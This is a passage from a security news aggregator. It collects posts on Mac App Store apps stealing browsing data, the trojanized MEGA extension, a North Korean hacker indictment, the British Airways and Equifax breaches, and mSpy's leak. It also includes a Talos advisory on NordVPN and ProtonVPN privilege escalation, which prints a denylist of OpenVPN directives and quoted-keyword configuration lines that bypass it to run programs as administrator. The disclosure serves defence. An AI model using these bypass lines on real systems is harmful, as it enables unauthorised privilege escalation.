  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: invidiadriver
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • rapidgens[.]info
Files and or directories created
  • %LocalAppData%\Temp\AFUVT.bat
  • %LocalAppData%\Temp\AFUVT.txt
  • %AppData%\system32\intelgfx.exe
  • %LocalAppData%\Temp\LFPKG.exe
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid)

No.1 Adware Removal Tool On Apple App Store Caught Spying On Mac Users

A highly popular top-tier app in Apple's Mac App Store that's designed to protect its users from adware and malware threats has been, ironically, found surreptitiously stealing their browsing history without their consent, and sending it to a server in China. What's more concerning? Even after Apple was warned a month ago, the company did not take any action against the app. The app in

Belgium Publishes Law Adapting the Belgian Legal Framework to the GDPR

On September 5, 2018, the Law of 30 July 2018 on the Protection of Natural Persons with regard to the Processing of Personal Data (the “Law”) was published in the Belgian Official Gazette.

This is the second step in adapting the Belgian legal framework to the EU GDPR after the Law of 3 December 2017 Creating the Data Protection Authority, which reformed the Belgian Data Protection Authority.

The Law is available in French and Dutch.

North Korean hacker charged for WannaCry and Sony cyberattacks

U.S. charges North Korean hacker for WannaCry, Sony cyber attacks

The U.S. government on Thursday charged and sanctioned a North Korean hacker for the 2014 Sony hack and the 2017 WannaCry global ransomware cyberattack, U.S. officials said.

The accused, Park Jin Hyok, worked as part of a team of hackers also known as the Lazarus Group, and has been charged under the U.S. government's strategy of naming and shaming hackers in order to deter future cyber attacks.

According to an FBI wanted poster released on Thursday, Park is identified as an alleged North Korean programmer who is accused of being “part of a state-sponsored hacking organization responsible for some of the costliest computer intrusions in history.”

Those attacks include the Sony Pictures Entertainment hack, the WannaCry attack and “a series of attacks targeting banks across the world that collectively attempted to steal more than one billion dollars,” according to the FBI.

The U.S. Treasury Department sanctioned Park, a computer programmer, and the North Korea entity, Chosun Expo Joint Venture, the company he worked for.

The Treasury said the joint venture, also known as Korea Expo Joint Venture, is “a front for the North Korean government,” according to the Justice Department.

“The scale and scope of the cyber-crimes alleged by the complaint is staggering and offensive to all who respect the rule of law and the cyber norms accepted by responsible nations,” said Assistant Attorney General for National Security John C. Demers.

“The complaint alleges that the North Korean government, through a state-sponsored group, robbed a central bank and citizens of other nations, retaliated against free speech in order to chill it half a world away, and created disruptive malware that indiscriminately affected victims in more than 150 other countries, causing hundreds of millions, if not billions, of dollars’ worth of damage.”

Park is also suspected of trying to hack into Lockheed Martin’s THAAD Missile defense system project currently deployed in South Korea. He is suspected of working for North Korea’s Reconnaissance General Bureau, a leading intelligence agency of that country.

The complaint against Park describes a “wide-ranging, multi-year conspiracy to conduct computer intrusions and commit wire fraud by co-conspirators working on behalf of the government of the Democratic People’s Republic of Korea, commonly known as North Korea.”

In 2014, the U.S. officials said unnamed North Korean hackers were responsible for the cyber attacks launched on Sony, which resulted in the loss of internal documents and data.

The hack on Sony Pictures came after Pyongyang sent a letter to the United Nations demanding that the movie production house not move forward with the movie “The Interview,” that showed the North Korean dictator Kim Jong Un in a negative light.

Park exploited multiple social media personas by sending malicious links to individuals involved in the production of the movie, the complaint said. The malicious links carried North Korean-controlled malware.

In 2017, WannaCry ransomware made headlines as one of the most widespread cyber attacks in history, bringing up to 300,000 computers running the Windows operating system in 150 countries to a standstill. Among the victims was Britain’s National Health Service (NHS), which had to close emergency rooms in a number of hospitals because of the attack.

Federal prosecutors have charged Park, who is not in custody, with conspiracy and conspiracy to commit wire fraud.

The Treasury Department, in a press release, said, “North Korea has demonstrated a pattern of disruptive and harmful cyber activity that is inconsistent with the growing consensus on what constitutes responsible state behavior in cyberspace.”

“Our policy is to hold North Korea accountable and demonstrate to the regime that there is a cost to its provocative and irresponsible actions.”

John Demers, the Assistant Attorney General of the National Security Division, said on Thursday, “The department has charged, arrested and imprisoned hackers working for the governments of China, Russia, and Iran. Today, we add the North Korean regime to our list, completing frankly four out of four of our principal adversaries in cyberspace.”

This is the first time the U.S. law enforcement agencies have formally charged a hacker involved in the North Korean “sponsored” cyber attacks. However, North Korea has denied the allegations of hacking.

The post North Korean hacker charged for WannaCry and Sony cyberattacks appeared first on TechWorm.

Mac App Store apps are stealing user data

There is a concerning trend lately in the Mac App Store. Several security researchers have independently found different apps that are collecting sensitive user data and uploading it to servers controlled by the developer. (This is referred to as exfiltrating the data.) Some of this data is actually being sent to Chinese servers, which may not be subject to the same stringent requirements around storage and protection of personally identifiable information as organizations based in the US or EU.

Adware Doctor

Patrick Wardle has recently posted an article detailing the misbehavior of an app named Adware Doctor, which is exfiltrating the following data:

  • Safari history
  • Chrome history
  • Firefox history
  • A list of all running processes
  • A list of software that you have downloaded and from where

Most of this is data that App Store apps should not be accessing, much less exfiltrating. In the case of the list of running processes, the app had to work around blockages that Apple has in place to prevent such apps from accessing that data. The developers found a loophole that allowed them to access that data despite Apple’s restrictions.

The developer of this app is one that we at Malwarebytes have had our eye on since 2015. At that time, we discovered an app on the App Store named Adware Medic—a direct rip-off of my own highly-successful app of the same name, which became Malwarebytes for Mac. We immediately began detecting this, and contacted Apple about removing the app. It was eventually removed, but was replaced soon after by an identical app named Adware Doctor.

We’ve continued to fight against this app, as well as others made by the same developer, and it has been taken down several times now, but in a continued failure of Apple’s review process, is always replaced by a new version before long.

Open Any Files: RAR Support

This app came onto our radar late last year. We’ve seen a number of different scam applications like this, which hijack the system’s functionality for handling documents that the user does not have an appropriate app to open, as a means for advertising other products…most often scams. The typical behavior is that, when the user opens an unfamiliar file, this app (and others like it) opens and promotes some antivirus software for scanning the file or the computer, often telling the user that they might be unable to open the file because they are infected.

Interestingly, this software was designed to promote what appeared to be a mainstream antivirus product. This seemed like an abuse of an affiliate program for that product.

It turned out that this app’s behavior was very similar to the current behavior of Adware Doctor. It was uploading a file named file.zip to the following URL:

update.appletuner.trendmicro.com/1/upload/search_keywords/

This file contained the following data:

  • Complete Safari browsing and search history
  • Complete Chrome browsing and search history
  • Complete Firefox browsing and search history
  • Complete App Store browsing history

We reported this app to Apple in December 2017. It is still present on the App Store.

As we were investigating, we found it very odd that Open Any Files was promoting Dr. Antivirus on the App Store. This led us to investigate Dr. Antivirus, as well as a number of other apps.

(Recently, Open Any Files stopped exfiltrating this data, but we have retained the evidence from our observations.)

Dr. Antivirus

On investigating, we learned that this app, like most Mac App Store apps, is limited in what it can detect to begin with, due to restrictions imposed by the App Store. However, even within the user folder, most antivirus apps in the App Store don’t have a good detection rate, and this was no exception.

Worse, however, was that we observed the same pattern of data exfiltration as seen in Open Any Files! We saw the same data being collected and also uploaded in a file named file.zip to the same URL used by Open Any Files.

This file, though, contained an interesting bonus. In addition to the browsing history, it also contained an interesting file named app.plist, which contained detailed information about every application found on the system. (See a short excerpt from the file below, showing only the information listed for Dr. Antivirus.)

It could be argued that it is useful for antivirus software to collect certain limited browsing history leading up to a malware/webpage detection and blocking. But it is very hard to justify exfiltrating the entire browsing history of all installed browsers regardless of whether the user has encountered malware or not. In addition, there was nothing in the app to inform the user about this data collection, and there was no way to opt out of it.

Dr. Cleaner

Unfortunately, other apps by the same developer are also collecting this data. We observed the same data being collected by Dr. Cleaner, minus the list of installed applications. There is really no good reason for a “cleaning” app to be collecting this kind of user data, even if the users were informed, which was not the case.

Interestingly, we found that the drcleaner[dot]com website was being used to promote these apps. WHOIS records identified an individual living in China, and having a foxmail.com email address, as being the registered owner of the domain.

What does all this mean?

It’s blindingly obvious at this point that the Mac App Store is not the safe haven of reputable software that Apple wants it to be. I’ve been saying this for several years now, as we’ve been detecting junk software in the App Store for almost as long as I’ve been at Malwarebytes. This is not new information, but these issues reveal a depth to the problem that most people are unaware of.

We’ve reported software like this to Apple for years, via a variety of channels, and there is rarely any immediate effect. In some cases, we’ve seen offending apps removed quickly, although sometimes those same apps have come back quickly (as was the case with Adware Doctor). In other cases, it has taken as long as six months for a reported app to be removed.

In many cases, apps that we have reported are still in the store. Case in point…all of the above.

I strongly encourage you to treat the App Store just like you would any other download location: as potentially dangerous. Be cautious of what you download. A free app from the App Store may seem perfectly innocent and harmless, but if you have to give that app access to any of your data as part of its expected functionality, you can’t know how it will use that data. Worse, even if you don’t give it access, it may find a loophole and get access to sensitive data anyway.

If you download one of these apps and are now regretting it, you can report the app to Apple:

https://reportaproblem.apple.com

Special thanks

Thanks go to folks who have spent their spare time finding and poking at these applications over the last year: PeterNopSled (from the Malwarebytes forums), @privacyis1st, and Patrick Wardle.

The post Mac App Store apps are stealing user data appeared first on Malwarebytes Labs.

Trojanized Extension Uploaded to Google’s Chrome Store

A trojanized version of the MEGA extension was uploaded to the Google Chrome webstore earlier this week and was automatically pushed to users via the autoupdate mechanism.

Through this extension, users get direct access to the MEGA secure cloud storage service in their browser, for improved performance. Also available on Android, the extension is highly popular, with over 1.7 million downloads in the Chrome store (it is also available on MEGA’s website).

On September 4, the cloud storage service announced that an unknown attacker managed to upload a trojanized iteration of the extension (version 3.39.4) to the Google Chrome webstore. The malicious code would immediately be sent to users who had the autoupdate feature enabled.

Once installed, the rogue extension would ask users to allow it to read and change all the data on the websites they visit. Armed with the elevated permissions, the malicious application version would attempt to gather user credentials and send them to a server located in Ukraine, MEGA reveals.

The code was targeting credentials for sites such as amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market, and HTTP POST requests to other sites, but did not target mega.nz credentials.

According to MEGA, the rogue extension version was removed from the Chrome store and replaced with a legitimate iteration (version 3.39.5) four hours after the breach occurred. The clean variant was served to users through the autoupdate mechanism. Google removed the extension from the webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4,” MEGA says.

All users who might have visited sites that send plain-text credentials through POST requests (or used another extension that does so) while the trojanized extension was active likely had their credentials compromised, on those sites and/or applications.

The issue, MEGA says, is that Google disallows publisher signatures on Chrome extensions and only relies on signing them automatically after upload to the Chrome webstore.

Thus, although the company uses “strict release procedures with multi-party code review, robust build workflow and cryptographic signatures where possible,” Google’s policy “removes an important barrier to external compromise.”

Both MEGAsync and the service’s Firefox extension, which are hosted by the company, are signed and “could therefore not have fallen victim to this attack vector,” MEGA claims. The mobile apps, which are hosted by Apple/Google/Microsoft, are also cryptographically signed, therefore immune as well.

The company hasn’t provided details on how the Chrome webstore account was compromised but is investigating the incident.
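As an added illustration (not MEGA's or Google's code), the check below audits an extension update for the two warning signs in this incident: a jump to the known-bad version 3.39.4 and a newly added request to read and change data on all sites, which is what the autoupdate prompted users to accept. The manifests are constructed samples; MEGA's real manifest contents and baseline permissions are not on the page and are assumed.

```python
"""Audit a Chrome extension update for the warning signs of the MEGA 3.39.4
incident: a version bump that suddenly requests access to every site the user
visits, pushed silently through autoupdate.

Hypothetical helper written for this page. The sample manifests below are
constructed; only the version number 3.39.4 and the "all sites" permission
come from MEGA's advisory.
"""
import json
import re
from typing import Dict, List

# Host match patterns that grant access to every site the user visits
# (Chrome shows these as "read and change all your data on the websites you visit").
BROAD_HOST_PATTERNS = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")

# Known-bad releases of specific extensions; 3.39.4 is from the advisory,
# extend this from your own intelligence.
KNOWN_BAD_VERSIONS = {"MEGA": {"3.39.4"}}


def host_permissions(manifest: Dict) -> List[str]:
    """Collect host match patterns from MV2 'permissions' and MV3 'host_permissions'."""
    hosts = []
    for key in ("permissions", "host_permissions", "optional_permissions"):
        for entry in manifest.get(key, []):
            # Anything with a scheme, or the <all_urls> token, is a host pattern;
            # plain API permissions such as "storage" are skipped.
            if "://" in entry or entry == "<all_urls>":
                hosts.append(entry)
    return hosts


def broad_hosts(manifest: Dict) -> List[str]:
    """Host patterns in this manifest that cover every site."""
    return [h for h in host_permissions(manifest) if BROAD_HOST_PATTERNS.match(h)]


def audit_update(old: Dict, new: Dict) -> List[str]:
    """Return human-readable findings for an extension that updated from old to new.

    Two checks: (1) the new version is a known trojanized release;
    (2) the update newly requests host access it did not have before,
    flagged separately when that access covers all sites.
    """
    findings = []
    name = new.get("name", "")
    version = new.get("version", "")
    for known, bad_versions in KNOWN_BAD_VERSIONS.items():
        if known.lower() in name.lower() and version in bad_versions:
            findings.append(f"{name} {version} is a known trojanized release")
    added = sorted(set(host_permissions(new)) - set(host_permissions(old)))
    added_broad = [h for h in added if BROAD_HOST_PATTERNS.match(h)]
    if added_broad:
        findings.append(
            f"update {old.get('version')} -> {version} newly requests access "
            f"to all sites: {added_broad}"
        )
    elif added:
        findings.append(f"update {old.get('version')} -> {version} adds host access: {added}")
    return findings


# Constructed sample manifests (not MEGA's real ones): the baseline only
# needs its own origin, the trojanized update asks for every site.
BASELINE_MANIFEST = json.loads("""{
  "name": "MEGA", "version": "3.39.3", "manifest_version": 2,
  "permissions": ["storage", "unlimitedStorage", "https://mega.nz/*"]
}""")
TROJANIZED_MANIFEST = json.loads("""{
  "name": "MEGA", "version": "3.39.4", "manifest_version": 2,
  "permissions": ["storage", "unlimitedStorage", "https://mega.nz/*", "<all_urls>"]
}""")

if __name__ == "__main__":
    for finding in audit_update(BASELINE_MANIFEST, TROJANIZED_MANIFEST):
        print("ALERT:", finding)
```

In a real deployment the baseline would be the manifest recorded at install time (for example from the browser's extensions directory), so that a silent permission escalation is caught before the user is asked to accept it.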


Copyright 2010 Respective Author at Infosec Island

CVE-2018-3952 (nordvpn)

An exploitable code execution vulnerability exists in the connect functionality of NordVPN 6.14.28.0. A specially crafted configuration file can cause a privilege escalation, resulting in the execution of arbitrary commands with system privileges.

CVE-2018-4010 (protonvpn)

An exploitable code execution vulnerability exists in the connect functionality of ProtonVPN VPN client 1.5.1. A specially crafted configuration file can cause a privilege escalation, resulting in the ability to execute arbitrary commands with the system's privileges.

CVE-2017-1114 (campaign)

IBM Campaign 9.1, 9.1.2, and 10 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 121152.

CVE-2017-1115 (campaign)

IBM Campaign 9.1, 9.1.2, and 10 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 121153.

“Shifting Left” Requires Remediation Guidance

Shifting security “left” is about more than simply changing the timing of testing. When security shifts to earlier phases of the development lifecycle, it also changes the players responsible for conducting the testing and addressing the results. In the not-so-distant past, the security team would conduct most security testing late in the software development process, pass the results back “over the wall” to developers, and consider their work done. But with the rise of DevOps and DevSecOps, finding and fixing security-related defects is a shared responsibility between security and development. In addition, security testing has shifted further left, into the realm of the developer. The development team now has primary responsibility for security in the development phase, and is responsible for making sure its code gets both scanned and fixed. The security team has more of an oversight role in the development phase, focusing on goals and policy. This is a significant change that requires entirely new tasks, skills, priorities, and mindset.

But there is one big blocker to this change: the fact that most developers don’t have secure coding skills. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey from DevOps.com and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren’t advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don’t provide them adequate training in application security. The bottom line is that most developers won’t know what to do with a long list of security flaws.

It follows that if you shift security left, into developer workflows, without adequate training and guidance – you will not create more secure code, but will in fact delay developer timelines and still produce vulnerable code. Shift left only works when developers get the tools and assistance they need to succeed. And a key part of that is remediation guidance. This adds another new task to the security team’s plate: developer training and coaching.

In their recent report, CISO Playbook: Embedding AST in the Software Development Lifecycle, Gartner notes that “organizations can better support AST early in development by prioritizing AST tools and services that integrate into IDEs and produce actionable findings, with an emphasis on the type and quality of information provided to developers. Tools that are fast but contain little guidance on remediation may not achieve the time savings desired, if developers struggle to understand why a vulnerability was introduced and how to fix it.”*

Ultimately, the speed at which you receive security-testing results is meaningless without the guidance needed to address those results.

We have research that supports this idea as well. Each year for our State of Software Security report, we analyze the data accumulated from all the security assessments we have performed the previous year. In our most recent report, we found that organizations that pick up consulting services that offer analysis and advice to developers alongside the scan results show tremendous improvement in fix rates. We looked at the flaws per MB among the organizations that took advantage of remediation coaching, and those that didn’t – both on their first and last scans of the year. The numbers revealed that remediation consulting can contribute to a whopping 88 percent improvement in an organization’s fix rate. Clearly, if developers are given extra resources to accomplish their security goals, they will make progress on the flaw density in their software.

The bottom line is that application security success is about more than finding security flaws; it’s about fixing them. And in a DevOps world, security and development have to work together to ensure that what gets found gets fixed. Make sure your developers are equipped to fix what they find and truly reduce your application security risk.

To get more best practices on embedding security into the development lifecycle, read the entire Gartner report, CISO Playbook: Embedding AST in the Software Development Lifecycle, mentioned above.


*Gartner CISO Playbook: Embedding AST in the Software Development Lifecycle, Ayal Tirosh, Prateek Bhajanka, 13 July 2018

British Airways hacked: 400,000 customers affected

British Airways, the UK’s largest airline, has been hacked, the company confirmed on its official website this week. According to a spokesperson who spoke to The Telegraph, almost 400,000 customers who booked a flight between 22:58 BST August 21 2018 and 21:45 BST September 5 2018 were affected.

Hackers stole customer personal and payment card data from the website and mobile app; travel and passport information was not compromised. British Airways customers affected by the breach were contacted on Thursday night and will be reimbursed for any financial loss. The airline warns that it will not send emails asking customers for their payment card data, so customers should stay alert for identity theft attempts.

Customers should urgently reset their passwords to ensure the safety of their bank accounts. Also, all are advised to monitor their financial situation and reach out to their banks and card providers, especially if they receive suspicious emails on behalf of the airline.

British Airways announced that the incident has been resolved and normal operations have resumed: customers can check in and make bookings. The relevant authorities have been informed and an investigation is ongoing.

“British Airways continues to investigate with the police and cyber specialists, and has reported the data theft to the Information Commissioner,” the company said.

According to a spokesperson, the airline detected the breach when “a third party noticed some unusual activity and informed us about it. We immediately acted to close down the issue, and started an investigation as a matter of urgency.”

IDG Contributor Network: The hidden security problem we all need to know about

Security is something that many enterprise users never want to think about – and often forget about – and those who do think about it assume that it’s running effectively in the background. Unfortunately, daily security breaches show that taking an ostrich approach of burying your head in the sand just doesn’t make them go away.

A key way to combat these breaches is to be as vigilant and up-to-date on security vulnerabilities as possible. Unfortunately, we just can’t rely on tech vendors to keep us informed or protect us from all potential issues. Case in point, there is a key vulnerability in Microsoft Windows that has not received much attention, but one that every enterprise should be aware of: the lack of protection for temporary “tmp” files. While it’s convenient to undo edits in a Word document, for example, the resulting security tradeoff for leaving your file vulnerable is a big one.

To read this article in full, please click here

Happy National Beer Lover’s Day!

Today is National Beer Lover’s Day. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

beersforlovers.com
divinebarley.com
everythingale.com
darkmicrobrew.com
icecoldsuds.com
bottleopenerdesigns.com
chugacoldmug.com
thecrazybarrel.com
beermountainsummit.com
letstalkale.com

.NET

beersforlovers.net
divinebarley.net
everythingale.net
darkmicrobrew.net
icecoldsuds.net
bottleopenerdesigns.net
chugacoldmug.net
thecrazybarrel.net
beermountainsummit.net
letstalkale.net


What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National Beer Lover’s Day!


*Available as of September 7, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Beer Lover’s Day! appeared first on Verisign Blog.

Vulnerability Spotlight: CVE-2018-3952 / CVE-2018-4010 – Multi-provider VPN Client Privilege Escalation Vulnerabilities

Discovered by Paul Rascagneres.


Overview


Cisco Talos has discovered two similar vulnerabilities in the ProtonVPN and NordVPN VPN clients. They allow an attacker with a standard user account to execute code as an administrator on Microsoft Windows. The vulnerabilities were assigned the identifiers TALOS-2018-0622 / CVE-2018-3952 (NordVPN) and TALOS-2018-0679 / CVE-2018-4010 (ProtonVPN).

The vulnerabilities are similar to a bug previously discovered by VerSprite in April 2018: CVE-2018-10169. That same month, both vendors released similar patches to fix this flaw. However, we identified a way to bypass that patch: despite the fix, it was still possible to execute code as an administrator on the system. The details section later in this post explains the first patch, why it was insufficient, and how the vendors finally fixed the problem.




Details


VPN clients' design


To understand the vulnerabilities, we first need to understand the design of the VPN clients mentioned in this article. Both clients have the same design:

  • The user interface. This binary is executed with the permission of the logged-in user. The purpose of this application is to allow the user to select the VPN configuration, such as the protocol, the location of the VPN server, etc. The information is sent to a service when the user clicks on "connect" (it's, in fact, an OpenVPN configuration file).
  • The service. This binary is used to receive orders from the user interface. For example, it receives the VPN configuration file from the user. The goal of the binary is to execute the OpenVPN client binary with the user configuration file (with administrator privileges).


The vulnerabilities in this article abuse the service and allow the standard user to execute arbitrary commands through OpenVPN with administrator privileges.

Initial vulnerability


The first vulnerability, discovered by VerSprite, is CVE-2018-10169. The author explains that he can create an OpenVPN configuration file with the following content:
plugin path\\OpenVPN_PoC.dll
The user interface sends this configuration file to the service, which passes it to OpenVPN. The result is that OpenVPN_PoC.dll is loaded and executed by OpenVPN with administrator privileges.

First patch and limitation


ProtonVPN and NordVPN applied the same patch: a check on the content of the OpenVPN configuration sent by the user. Note the grouping parentheses around the four StartsWithName() calls, which the excerpt as originally published left unbalanced:
if ( !text.StartsWithIgnoringCase("<tls-auth>") &&
!text.StartsWithIgnoringCase("<ca>") &&
(OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "up") ||
OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
{
reason = string.Format("Invalid configuration file. Reason: {0}", text);
return false;
}
This code rejects the configuration file if a line starts with plugin, script-security, up or down. These are the OpenVPN directives that can execute code or commands.

Here is the code of the check (the opening brace was missing from the excerpt as originally published):
private static bool StartsWithName(string line, string name)
{
return line.StartsWithIgnoringCase(name + " ") ||
line.StartsWithIgnoringCase(name + "\t") ||
line.EqualsIgnoringCase(name);
}
The developer compares the keyword followed by a space, the keyword followed by a tab, and the keyword alone on the line, so that a tab separator cannot be used to slip past a check that only looked for a space.

However, reading the OpenVPN source code of the configuration file parser, we can see in the parse_line() function that a keyword can be enclosed in quotation marks. Therefore, we can add the following text to the configuration file:
"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe
This is valid for OpenVPN, and it passes the checks of both VPN services, because the quoted lines do not start with the raw keywords the validator looks for.

The service launches OpenVPN, which in turn executes notepad.exe with administrator privileges.
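To make the parser mismatch concrete, here is an added Python model (not the vendors' C# or OpenVPN's C code) of the first patch's prefix check next to a check that tokenises the line the way OpenVPN's parse_line() does before comparing the directive name. The quoting rules are a simplified approximation of OpenVPN's, and the hostname and DLL name in the sample lines are constructed.

```python
# The four directives the vendors' check names; each can make OpenVPN run code.
DANGEROUS_DIRECTIVES = {"plugin", "script-security", "up", "down"}

def starts_with_name(line, name):
    """Python rendering of the patch's StartsWithName(): keyword + space/tab, or alone."""
    low = line.lower()
    return low.startswith(name + " ") or low.startswith(name + "\t") or low == name

def first_patch_rejects(line):
    """The first patch: reject a line only if its raw text begins with a keyword."""
    if line.lower().startswith("<tls-auth>") or line.lower().startswith("<ca>"):
        return False
    return any(starts_with_name(line, n) for n in DANGEROUS_DIRECTIVES)

def tokenize_openvpn_line(line):
    """Simplified model of OpenVPN's parse_line(): whitespace separates tokens, single
    or double quotes group a token and are stripped, a backslash escapes the next
    character (outside single quotes), and '#' or ';' at a token start begins a comment."""
    tokens, cur, i, n = [], None, 0, len(line)
    while i < n:
        c = line[i]
        if cur is None:  # between tokens
            if c in " \t\r\n":
                i += 1
                continue
            if c in "#;":
                break  # comment: the rest of the line is ignored
            cur = ""
        if c == "'":
            j = line.find("'", i + 1)
            if j < 0:
                raise ValueError("unterminated single quote")
            cur += line[i + 1:j]
            i = j + 1
        elif c == '"':
            j = i + 1
            while j < n and line[j] != '"':
                if line[j] == "\\" and j + 1 < n:
                    j += 1  # escaped character inside double quotes
                cur += line[j]
                j += 1
            if j >= n:
                raise ValueError("unterminated double quote")
            i = j + 1
        elif c == "\\":
            if i + 1 < n:
                cur += line[i + 1]
            i += 2
        elif c in " \t":
            tokens.append(cur)
            cur = None
            i += 1
        else:
            cur += c
            i += 1
    if cur is not None:
        tokens.append(cur)
    return tokens

def hardened_rejects(line):
    """Compare the directive name OpenVPN itself would see, not the raw line prefix."""
    tokens = tokenize_openvpn_line(line)
    return bool(tokens) and tokens[0].lower() in DANGEROUS_DIRECTIVES

def flagged_lines(lines, check):
    """Run a per-line check over a configuration and return the lines it rejects."""
    return [ln for ln in lines if check(ln)]

# Constructed sample configuration: benign directives, the two bypass lines quoted in
# the write-up, a single-quote variant, and a comment. Hostname and DLL name are made up.
SAMPLE_LINES = [
    "client",
    "dev tun",
    "remote vpn.example.invalid 1194 udp",
    "plugin\tsome.dll",                    # tab separator: the first patch catches this
    '"script-security" 2',                 # quoted keyword: the first patch misses this
    '"up" C:\\\\WINDOWS\\\\system32\\\\notepad.exe',
    "'down' C:\\\\WINDOWS\\\\system32\\\\notepad.exe",
    "# up this is a comment, not a directive",
]

if __name__ == "__main__":
    print("first patch flags :", flagged_lines(SAMPLE_LINES, first_patch_rejects))
    print("tokenising check  :", flagged_lines(SAMPLE_LINES, hardened_rejects))
```

Even the tokenising check is a denylist measured against a parser it only approximates; the vendors' final fixes, which stop accepting user-controlled configuration altogether, remove the mismatch instead of chasing it.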

New patches


The new patches developed by the two vendors differ. ProtonVPN now stores the OpenVPN configuration file in the installation directory, which a standard user cannot modify, so the malicious directives cannot be added to it. NordVPN decided to generate the OpenVPN configuration file from an XML template that a standard user cannot edit.

More details can be found in the vulnerability reports:


Tested Versions:


  • ProtonVPN VPN Client 1.5.1
  • NordVPN 6.14.28.0


Coverage


The following Snort rules will detect exploitation attempts. Additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Console or Snort.org.

Snort Rules: 47035 - 47036


Sound, Fury, And Nothing One Year After Equifax

One year ago today, Equifax suffered what remains one of the largest and most impactful data breaches in U.S. history. Last September, it was revealed that the personal information of 145 million Americans, almost 700,000 UK citizens, and 19,000 Canadians was stolen by cybercriminals.

This information included names, addresses, birthdays, Social Security numbers and, in some cases, driver’s licenses: all critical personally identifiable information (PII) that can be resold in the underground and used to commit identity fraud.

This breach had very real impact on the millions affected. On Equifax? Or the industry as a whole? Not so much…

The result is that your personal information remains “entrusted” with various agencies without your knowledge. Agencies that may or may not have your best interests at heart. A year after the Equifax breach, your data has never been at greater risk. Why?

The Equifax breach made international headlines for weeks. It’s a story that has corporate intrigue, political uproar, and controversy…yet nothing really has changed.

What Happened?

Cybercriminals gained access to Equifax’s systems through a known vulnerability in Apache Struts (a web application framework). This easily exploited vulnerability had been left unpatched and unmitigated by Equifax for weeks.

When Equifax discovered the breach, they waited weeks to notify affected individuals and the general public. That notification came in the form of an insecure site on a new domain name. This contributed to the criticism the company faced as they bumbled the response.

The saga took a number of twists and unexpected turns as executives were accused of insider trading, having sold shares valued at $1.8 million after the breach was discovered but before the public announcement. The CIO and CISO stepped down in the wake of the breach. As the company continued to face pushback and political and consumer frustration, the CEO eventually resigned, allowing the company to try to turn the page.

After all, Equifax had the tools, people, and process in place to prevent the breach but simply dropped the ball…with catastrophic results.

Customers?

One of the biggest challenges in light of this breach was the relationship that Equifax had with the affected individuals. Equifax maintained a significant amount of personally identifiable information on hundreds of millions of individuals in the US and around the world yet very few of these individuals had a direct relationship with the company.

Equifax and a handful of other consumer credit reporting agencies make their money by selling consumer profiles and credit ratings to other businesses, essentially acting as massive reputation clearing houses.

Given the role played by these agencies, individuals in the US have alarmingly few actions they can take in recourse to an error or breach of their information in care of such an agency. This was a key point raised in the uproar after the Equifax breach.

One year later, let’s check in on the progress made so far…

Lack of Personal Data Protections

Alarmingly, there has been no federal action and only one state has passed legislation regarding personal data protections since the Equifax breach.

In June, California passed the California Consumer Privacy Act of 2018 (AB 375). This landmark legislation takes a much needed step towards personal data protections in the state of California. While not the driving factor for the legislation, the breach contributed to awareness of the need for such protections.

This protects Californians in a similar manner to Europeans under GDPR. If either piece of legislation had been in effect during the Equifax breach, the company would have been looking at major fines.

What Now?

Despite the initial uproar, very little has happened in wake of the Equifax breach. The creation of strict regulation in the EU had been underway for years. The initiative in California had already been underway when this breach happened.

Despite the outrage, very little came of the breach outside of Equifax itself. They brought in new leadership and have tried to shift the security culture, both solid steps. The consent letter signed will help ensure that Equifax continues to build a strong security culture but it doesn’t impact any of the other agencies.

Is this the future? As more and more companies move to monetize data and customer behaviours, a lack of political will and a lack of consumer pressure means that YOUR data remains at risk.

Regulation is always challenging but it’s clear that the market isn’t providing a solution as few of the affected individuals have a relationship with the companies holding the data. Your personal information is just that…yours and very personal.

Individuals need the ability to hold organizations that put that information at risk accountable.


Mobile Spyware Maker mSpy Leaks Millions of Sensitive Records



Security researcher Nitish Shah uncovered a data leak at mSpy, a mobile spyware maker that claims to help more than a million paying customers monitor the phones of their children and partners.

mSpy leaked millions of sensitive records online, including passwords, call logs, text messages, contacts, notes and location data covertly collected from phones running the stealthy spyware. Shah also found that no authentication was required to access the records.
According to Shah, the exposed data additionally included the most recent six months of mSpy license purchase records and mSpy customer logs, along with the Apple iCloud data of devices with the spyware installed on them.


